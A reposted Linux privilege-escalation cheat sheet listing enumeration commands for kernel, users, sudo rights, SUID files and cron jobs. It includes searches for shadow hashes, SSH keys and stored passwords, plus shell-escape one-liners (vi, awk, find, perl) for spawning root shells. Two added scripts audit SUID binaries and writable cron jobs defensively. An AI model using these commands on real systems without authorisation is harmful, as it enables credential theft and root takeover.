Linux Privilege Escalation Summary

Source: Internet | Editor: 程序博客网 | Time: 2024/05/21 08:45

Kernel, Operating System & Device Information:

Command
    Result
uname -a
    Print all available system information
uname -r
    Kernel release
uname -n
    System hostname
hostname
    As above
uname -m
    Linux kernel architecture (32 or 64 bit)
cat /proc/version
    Kernel information
cat /etc/*-release
    Distribution information
cat /etc/issue
    As above
cat /proc/cpuinfo
    CPU information
df -a
    File system information

 

Users & Groups:

Command
    Result
cat /etc/passwd
    List all users on the system
cat /etc/group
    List all groups on the system
for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null
    List all uid's and respective group memberships
cat /etc/shadow
    Show user hashes – Privileged command
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
    List all super user accounts
finger
    Users currently logged in
pinky
    As above
users
    As above
who -a
    As above
w
    Who is currently logged in and what they're doing
last
    Listing of last logged on users
lastlog
    Information on when all users last logged in
lastlog -u %username%
    Information on when the specified user last logged in
lastlog |grep -v "Never"
    Entire list of previously logged on users

 

User & Privilege Information:

Command
    Result
whoami
    Current username
id
    Current user information
cat /etc/sudoers
    Who's allowed to do what as root – Privileged command
sudo -l
    Can the current user perform anything as root
sudo -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null
    Can the current user run any 'interesting' binaries as root and if so also display the binary permissions etc.

 

Environmental Information:

Command
    Result
env
    Display environmental variables
set
    As above
echo $PATH
    Path information
history
    Displays command history of current user
pwd
    Print working directory, i.e. 'where am I'
cat /etc/profile
    Display default system variables
cat /etc/shells
    Display available shells

 

Interesting Files:

Command
    Result
find / -perm -4000 -type f 2>/dev/null
    Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null
    Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null
    Find SGID files
find / -perm -2 -type f 2>/dev/null
    Find world-writeable files
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
    Find world-writeable files excluding those in /proc
find / -perm -2 -type d 2>/dev/null
    Find world-writeable directories
find /home -name "*.rhosts" -print 2>/dev/null
    Find rhost config files
find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;
    Find *.plan files, list permissions and cat the file contents
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;
    Find hosts.equiv, list permissions and cat the file contents
ls -ahlR /root/
    See if you can access other user directories to find interesting files
cat ~/.bash_history
    Show the current user's command history
ls -la ~/.*_history
    Show the current user's various history files
ls -la /root/.*_history
    Can we read root's history files
ls -la ~/.ssh/
    Check for interesting ssh files in the current user's directory
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
    Find SSH keys/host information
ls -la /usr/sbin/in.*
    Check configuration of inetd services
grep -l -i pass /var/log/*.log 2>/dev/null
    Check log files for keywords ('pass' in this example) and show positive matches
find /var/log -type f -exec ls -la {} \; 2>/dev/null
    List files in specified directory (/var/log)
find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null
    List .log files in specified directory (/var/log)
find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null
    List .conf files in /etc (recursive 1 level)
ls -la /etc/*.conf
    As above
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null
    Find .conf files (recursive 4 levels) and output the line number where the word 'password' is located
lsof -i -n
    List open files (output will depend on account privileges)
head /var/mail/root
    Can we read root's mail
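On a busy host the raw SUID listing above is long and mostly legitimate; what an administrator actually wants to know is which SUID binaries are not expected. The following added example (not from the original cheat sheet) wraps the page's find predicates in functions and diffs the SUID hits against a baseline allow-list with comm, so only unexpected entries are printed. The directory tree, permissions and baseline are constructed in a temporary directory and are sample values, not a real system; run the functions against / and a baseline captured from a known-good build to audit a host.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): SUID/SGID and world-writable
# audit with a baseline allow-list, run against a constructed directory tree.

# find_suid ROOT: SUID regular files under ROOT (the cheat sheet's predicate, rooted at ROOT)
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# find_sgid ROOT: SGID regular files under ROOT
find_sgid() {
    find "$1" -perm -2000 -type f 2>/dev/null | sort
}

# find_world_writable ROOT: world-writable regular files, skipping anything under a
# proc directory as the cheat sheet does
find_world_writable() {
    find "$1" ! -path "*/proc/*" -perm -0002 -type f 2>/dev/null | sort
}

# unexpected_suid ROOT BASELINE: SUID files under ROOT that are absent from BASELINE
# (one absolute path per line). comm -23 prints lines only in the first (found) list,
# so nothing printed means no surprises.
unexpected_suid() {
    _found=$(mktemp)
    find_suid "$1" > "$_found"
    sort "$2" | comm -23 "$_found" -
    rm -f "$_found"
}

# --- constructed sample tree (not a real system) ---
umask 022
SAMPLE_ROOT=$(mktemp -d)
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/usr/bin" "$SAMPLE_ROOT/tmp" "$SAMPLE_ROOT/proc/1"
printf '#!/bin/sh\n' > "$SAMPLE_ROOT/usr/bin/passwd"   # expected SUID binary (in baseline)
printf '#!/bin/sh\n' > "$SAMPLE_ROOT/usr/bin/helper"   # unexpected SUID binary
printf '#!/bin/sh\n' > "$SAMPLE_ROOT/usr/bin/wall"     # SGID binary
printf 'x\n' > "$SAMPLE_ROOT/tmp/notes"                # world-writable file
printf 'x\n' > "$SAMPLE_ROOT/proc/1/status"            # world-writable but under proc: skipped
chmod 4755 "$SAMPLE_ROOT/usr/bin/passwd" "$SAMPLE_ROOT/usr/bin/helper"
chmod 2755 "$SAMPLE_ROOT/usr/bin/wall"
chmod 0666 "$SAMPLE_ROOT/tmp/notes" "$SAMPLE_ROOT/proc/1/status"
printf '%s\n' "$SAMPLE_ROOT/usr/bin/passwd" > "$SAMPLE_ROOT/suid.baseline"

echo "Unexpected SUID binaries:"; unexpected_suid "$SAMPLE_ROOT" "$SAMPLE_ROOT/suid.baseline"
echo "SGID binaries:";            find_sgid "$SAMPLE_ROOT"
echo "World-writable files:";     find_world_writable "$SAMPLE_ROOT"
```

The baseline is the important design choice: a SUID listing taken from a freshly installed image of the same distribution gives a set difference that is small enough to review by hand, whereas the unfiltered list is what most people stop reading after the first screen.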

 

Service Information:

Command
    Result
ps aux | grep root
    View services running as root
ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'
    Lookup process binary path and permissions
cat /etc/inetd.conf
    List services managed by inetd
cat /etc/xinetd.conf
    As above for xinetd
cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null
    A very 'rough' command to extract associated binaries from xinetd.conf and show permissions of each
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
    Permissions and contents of /etc/exports (NFS)

 

Jobs/Tasks:

Command
    Result
crontab -l -u %username%
    Display scheduled jobs for the specified user – Privileged command
ls -la /etc/cron*
    Scheduled jobs overview (hourly, daily, monthly etc)
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
    What can 'others' write in /etc/cron* directories
top
    List of current tasks
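The "what can others write in /etc/cron*" check above lists writable entries, but the condition that matters for an audit is a job that runs as root and executes a file that others can modify. The following added example (not part of the original cheat sheet) parses crontabs in the system layout used by /etc/cron.d (minute hour day month weekday user command, plus @reboot-style lines) and reports every job whose command file is world-writable, alongside the plain world-writable search over the cron directories. The crontab files, scripts and permissions are constructed in a temporary directory as sample data; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): audit system-layout crontabs for
# jobs whose command file is writable by others, run against a constructed tree.

# world_writable_under PATH...: files or directories under the given paths with the
# others-write bit set (what the cheat sheet's awk '$1 ~ /w.$/' test looks for in ls -l)
world_writable_under() {
    find "$@" -perm -0002 2>/dev/null | sort
}

# writable_cron_jobs DIR: read every crontab in DIR and print one line per job whose
# command file is world-writable. Such a job hands control of the job's account to
# anyone who can edit that file; with user=root that is a full compromise.
writable_cron_jobs() {
    for crontab in "$1"/*; do
        [ -f "$crontab" ] || continue
        while read -r f1 f2 f3 f4 f5 f6 rest; do
            case $f1 in
                '#'*|'') continue ;;                              # comment or blank line
                *=*)     continue ;;                              # NAME=value environment setting
                @*)      user=$f2; cmd="$f3 $f4 $f5 $f6 $rest" ;; # @reboot user command
                *)       user=$f6; cmd=$rest ;;                   # m h dom mon dow user command
            esac
            script=${cmd%% *}                                     # first word of the command
            [ -n "$script" ] || continue
            if [ -n "$(world_writable_under "$script")" ]; then
                echo "WRITABLE-JOB user=$user file=$script crontab=$(basename "$crontab")"
            fi
        done < "$crontab"
    done
}

# --- constructed sample tree (not a real system) ---
umask 022
SAMPLE_ROOT=$(mktemp -d)
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/etc/cron.d" "$SAMPLE_ROOT/etc/cron.hourly" "$SAMPLE_ROOT/usr/local/bin"
printf '#!/bin/sh\nexit 0\n' > "$SAMPLE_ROOT/usr/local/bin/backup.sh"
printf '#!/bin/sh\nexit 0\n' > "$SAMPLE_ROOT/usr/local/bin/rotate.sh"
chmod 0777 "$SAMPLE_ROOT/usr/local/bin/backup.sh"   # anyone can rewrite the root job's script
chmod 0755 "$SAMPLE_ROOT/usr/local/bin/rotate.sh"   # correctly restricted
chmod 0777 "$SAMPLE_ROOT/etc/cron.hourly"           # anyone can drop a job in here
cat > "$SAMPLE_ROOT/etc/cron.d/backup" <<EOF
# nightly backup (constructed sample)
SHELL=/bin/sh
0 2 * * * root $SAMPLE_ROOT/usr/local/bin/backup.sh >/dev/null 2>&1
EOF
cat > "$SAMPLE_ROOT/etc/cron.d/rotate" <<EOF
*/15 * * * * root $SAMPLE_ROOT/usr/local/bin/rotate.sh
@reboot www-data $SAMPLE_ROOT/usr/local/bin/rotate.sh --reset
EOF

echo "World-writable paths under the cron directories:"
world_writable_under "$SAMPLE_ROOT"/etc/cron*
echo "Jobs whose command file others can modify:"
writable_cron_jobs "$SAMPLE_ROOT/etc/cron.d"
```

On a real host call world_writable_under /etc/cron* and writable_cron_jobs /etc/cron.d; the cron.hourly/daily/weekly directories hold plain scripts rather than crontab lines, so for those the directory and file permissions from the first function are the relevant result.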

 

Networking, Routing & Communications:

Command
    Result
/sbin/ifconfig -a
    List all network interfaces
cat /etc/network/interfaces
    As above
arp -a
    Display ARP communications
route
    Display route information
cat /etc/resolv.conf
    Show configured DNS server addresses
netstat -antp
    List all TCP sockets and related PIDs (-p Privileged command)
netstat -anup
    List all UDP sockets and related PIDs (-p Privileged command)
iptables -L
    List rules – Privileged command
cat /etc/services
    View port numbers/services mappings

 

Programs Installed:

Command
    Result
dpkg -l
    Installed packages (Debian)
rpm -qa
    Installed packages (Red Hat)
sudo -V
    Sudo version – does an exploit exist?
httpd -v
    Apache version
apache2 -v
    As above
apache2ctl (or apachectl) -M
    List loaded Apache modules
mysql --version
    Installed MySQL version details
psql -V
    Installed Postgres version details
perl -v
    Installed Perl version details
java -version
    Installed Java version details
python --version
    Installed Python version details
ruby -v
    Installed Ruby version details
find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)
    Locate 'useful' programs (netcat, wget etc)
which %program_name% (i.e. nc, netcat, wget, nmap etc)
    As above
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null
    List available compilers
cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*export /,"")}1'
    Which account is Apache running as

 

Common Shell Escape Sequences:

Command
    Program(s)
:!bash
    vi, vim
:set shell=/bin/bash:shell
    vi, vim
!bash
    man, more, less
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    find
awk 'BEGIN {system("/bin/bash")}'
    awk
--interactive
    nmap
perl -e 'exec "/bin/bash";'
    Perl

Reposted from: http://www.rebootuser.com/?p=1623#.VzPhuda1nCI
